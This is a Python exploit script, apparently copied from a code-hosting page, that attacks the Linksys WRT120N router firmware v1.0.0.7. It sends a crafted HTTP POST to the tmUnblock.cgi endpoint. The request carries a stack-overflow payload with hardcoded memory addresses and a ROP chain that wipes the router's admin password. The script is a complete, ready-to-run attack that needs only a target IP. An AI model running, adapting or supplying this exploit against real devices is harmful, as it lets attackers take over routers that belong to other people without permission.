49 lines
No EOL
1.7 KiB
Python
Executable file
49 lines
No EOL
1.7 KiB
Python
Executable file
#!/usr/bin/env python
|
|
#
|
|
# WRT120N v1.0.0.7 stack overflow, ROP to 4-byte overwrite which clears the admin password.
|
|
#
|
|
# Craig Heffner
|
|
# http://www.devttys0.com
|
|
# 2014-02-14
|
|
|
|
import sys
|
|
import urllib2
|
|
|
|
try:
|
|
target = sys.argv[1]
|
|
except IndexError:
|
|
print "Usage: %s <target ip>" % sys.argv[0]
|
|
sys.exit(1)
|
|
|
|
url = target + '/cgi-bin/tmUnblock.cgi'
|
|
if '://' not in url:
|
|
url = 'http://' + url
|
|
|
|
post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="
|
|
post_data += "B" * 246 # Filler
|
|
post_data += "\x81\x54\x4A\xF0" # $s0, address of admin password in memory
|
|
post_data += "\x80\x31\xF6\x34" # $ra
|
|
post_data += "C" * 0x28 # Stack filler
|
|
post_data += "D" * 4 # ROP 1 $s0, don't care
|
|
post_data += "\x80\x34\x71\xB8" # ROP 1 $ra (address of ROP 2)
|
|
post_data += "E" * 8 # Stack filler
|
|
|
|
for i in range(0, 4):
|
|
post_data += "F" * 4 # ROP 2 $s0, don't care
|
|
post_data += "G" * 4 # ROP 2 $s1, don't care
|
|
post_data += "\x80\x34\x71\xB8" # ROP 2 $ra (address of itself)
|
|
post_data += "H" * (4-(3*(i/3))) # Stack filler; needs to be 4 bytes except for the
|
|
# last stack frame where it needs to be 1 byte (to
|
|
# account for the trailing "\n\n" and terminating
|
|
# NULL byte)
|
|
|
|
try:
|
|
req = urllib2.Request(url, post_data)
|
|
res = urllib2.urlopen(req)
|
|
except urllib2.HTTPError as e:
|
|
if e.code == 500:
|
|
print "OK"
|
|
else:
|
|
print "Received unexpected server response:", str(e)
|
|
except KeyboardInterrupt:
|
|
pass |